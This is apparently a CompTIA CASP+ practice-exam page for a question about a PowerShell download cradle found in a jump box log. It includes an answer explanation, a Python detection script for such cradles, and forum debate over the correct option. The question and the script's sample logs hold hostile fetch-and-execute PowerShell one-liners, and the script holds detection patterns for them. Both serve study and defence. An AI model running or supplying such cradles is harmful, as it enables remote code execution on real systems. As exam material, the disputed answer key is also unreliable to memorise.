Exam CAS-004
Question 109

A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file: `powershell IEX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl');whois`

Which of the following security controls would have alerted and prevented the next phase of the attack?

    Correct Answer: C

    To alert and prevent the execution of a PowerShell command that downloads and runs a script, Endpoint Detection and Response (EDR) along with an application-approved list would be effective. EDR can detect and alert on suspicious activities such as unexpected PowerShell executions, providing visibility and response capabilities. An application-approved list would prevent unauthorized applications like malicious PowerShell scripts from running. This combination directly addresses the nature of the attack described.
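The answer above describes what an EDR does in the abstract. As an added example (written for this page, not taken from the original question, CompTIA or any EDR vendor), the following Python script shows the kind of logic an endpoint sensor or SIEM rule applies to PowerShell script-block logs to flag a download cradle like the one in the question: a remote fetch primitive (`Net.WebClient`, `DownloadString`, `Invoke-WebRequest`) combined with an in-memory execution primitive (`IEX` / `Invoke-Expression`) in the same script block. The log line format, the host and user names, and the `example.invalid` URLs are all constructed assumptions; real script-block logging (Event ID 4104) carries the same `ScriptBlockText` content in a different envelope.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed sample log lines (assumption: one PowerShell script block per
# line, pipe-separated fields). Hosts, users and URLs are made up for the demo.
SAMPLE_LOGS = [
    "2024-01-01T10:00:01Z | host=JUMP01 | user=svc_backup | ScriptBlockText=Get-ChildItem C:\\Temp",
    "2024-01-01T10:00:05Z | host=JUMP01 | user=jdoe | ScriptBlockText=IEX(New-Object Net.WebClient).DownloadString('https://example.invalid/whois.ps1');whois",
    "2024-01-01T10:00:09Z | host=JUMP01 | user=jdoe | ScriptBlockText=Invoke-Expression (Invoke-WebRequest -Uri 'https://example.invalid/x.ps1').Content",
    "2024-01-01T10:00:12Z | host=JUMP02 | user=admin | ScriptBlockText=Get-Service | Where-Object Status -eq Running",
    "2024-01-01T10:00:15Z | host=JUMP02 | user=jdoe | ScriptBlockText=powershell -nop -w hidden -EncodedCommand SQBFAFgA",
]

# Anchored parse of the assumed envelope. ScriptBlockText is taken greedily to
# the end of the line so that pipelines inside the script (" | ") do not break
# the field split.
LOG_RE = re.compile(
    r"^(?P<ts>\S+) \| host=(?P<host>\S+) \| user=(?P<user>\S+) \| ScriptBlockText=(?P<script>.*)$"
)

# In-memory execution primitives: the "run what you just fetched" half of a cradle.
EXEC_PRIMITIVES = re.compile(r"\b(IEX|Invoke-Expression)\b", re.IGNORECASE)

# Remote fetch primitives: the "pull code from the internet" half of a cradle.
REMOTE_FETCH = re.compile(
    r"(Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|"
    r"Invoke-RestMethod|\birm\b|Start-BitsTransfer)",
    re.IGNORECASE,
)

# Launch flags that are rarely used by administrators interactively but are
# common in malicious one-liners (encoded payloads, hidden windows, no profile).
OBFUSCATION = re.compile(
    r"(-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{8,}|FromBase64String|"
    r"-w(indowstyle)?\s+hidden|(?:^|\s)-nop\b)",
    re.IGNORECASE,
)


@dataclass
class Finding:
    ts: str
    host: str
    user: str
    rules: List[str]
    script: str


def classify(script: str) -> List[str]:
    """Return the names of the detection rules a single script block triggers."""
    hits: List[str] = []
    has_exec = bool(EXEC_PRIMITIVES.search(script))
    has_fetch = bool(REMOTE_FETCH.search(script))
    if has_exec and has_fetch:
        hits.append("download_cradle")   # fetch + execute in one block: high confidence
    elif has_fetch:
        hits.append("remote_download")   # fetch alone: often benign, worth triage
    if OBFUSCATION.search(script):
        hits.append("suspicious_launch_flags")
    return hits


def detect(lines: List[str]) -> List[Finding]:
    """Run every rule over a batch of log lines and collect the findings in order."""
    findings: List[Finding] = []
    for raw in lines:
        m = LOG_RE.match(raw)
        if not m:
            continue  # unparseable envelope; a real pipeline would count these
        rules = classify(m["script"])
        if rules:
            findings.append(Finding(m["ts"], m["host"], m["user"], rules, m["script"]))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOGS):
        print(f"{f.ts} {f.host} {f.user} {','.join(f.rules)}: {f.script[:60]}")
```

Two design points worth noting. The cradle rule fires only when both halves are present in one block, which is what keeps it from paging on every `Invoke-WebRequest` an administrator runs; the fetch-only and launch-flag rules are lower-confidence signals meant for correlation rather than blocking. And because the rules run over `ScriptBlockText` rather than the command line, they still see the code after `-EncodedCommand` wrappers are unwrapped, which a command-line-only match would miss; with an application allow list in enforcing mode, the unsigned script pulled by the cradle is the part that gets blocked rather than `powershell.exe` itself.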

Discussion
RevZig67 (Option: C)

An EDR and whitelist should protect from this attack.

angryelvis (Option: D)

Are the key words actually "next phase"? If so, MFA would prevent logins and a forward proxy could prevent a compromised workstation from reaching home directly. I'm not certain about the proxy, please tell me if I'm wrong.

Mr_BuCk3th34D

I agree. To alert and prevent the next phase of the attack, the security analyst should consider implementing a forward proxy and MFA (Multi-Factor Authentication). This is the most effective answer for the NEXT phase of the attack. In this case, a forward proxy could be configured to block access to the external-facing mail server based on the number of failed login attempts, which would help prevent the attack from progressing. By implementing MFA, the organization can help prevent unauthorized access to the external-facing mail server, even if an attacker is able to obtain a user's password.

Serliop378

It would not have alerted on the next phase of the attack like an EDR would.

tefyayaydu

A forward proxy would have sent out an alert in the 'next' phase of an attack, which is the login attempts. The application list will not stop anything in this regard. Read Bucket's response below. If it wasn't asking for the 'next' phase, then EDR would be correct for the current phase.

dangerelchulo (Option: C)

Key word: alerted. EDR does that.

BiteSize (Option: C)

EDR and application whitelisting are the only things that would see a PowerShell script spawn a new process and understand that it is not baseline behavior to respond effectively. Source: Verifying each answer against Chat GPT, my experience, other test banks, a written book, and weighing in the discussion from all users to create a 100% accurate guide for myself before I take the exam. (It isn't easy because of the time needed, but it is doing my diligence)

javier051977 (Option: B)

The PowerShell command is using the Invoke-Expression (IEX) function to execute a remote script hosted on a third-party website. This is an example of fileless malware, which can bypass traditional antivirus solutions.

armid (Option: C)

If you think about this from a MITRE perspective, the attacker is in the initial access (with doing some extra recon) phase. The next phase should be execution, to try to run malicious code. So the answer should be C. The bruteforcing phase is over, as indicated in the question (the analyst found that evidence in the logs), so MFA at this point is a bit too late. B would help but not alert, and help only partially; the attacker would eventually find a way to bypass this. A: antivirus could prevent and UEBA could alert, but C is already a much safer option.

cyspec (Option: A)

"alerted" narrows the options down to A and C. Since it involves failed login attempts, a user account must have been accessed. UEBA would have flagged anomalies regarding a user's actions (running PowerShell). There was no further indication of the attacker using other applications, as they are downloading PS scripts. Approved application lists would not have done anything if PS successfully ran (meaning that PS was on the list) and the attacker continued using PS.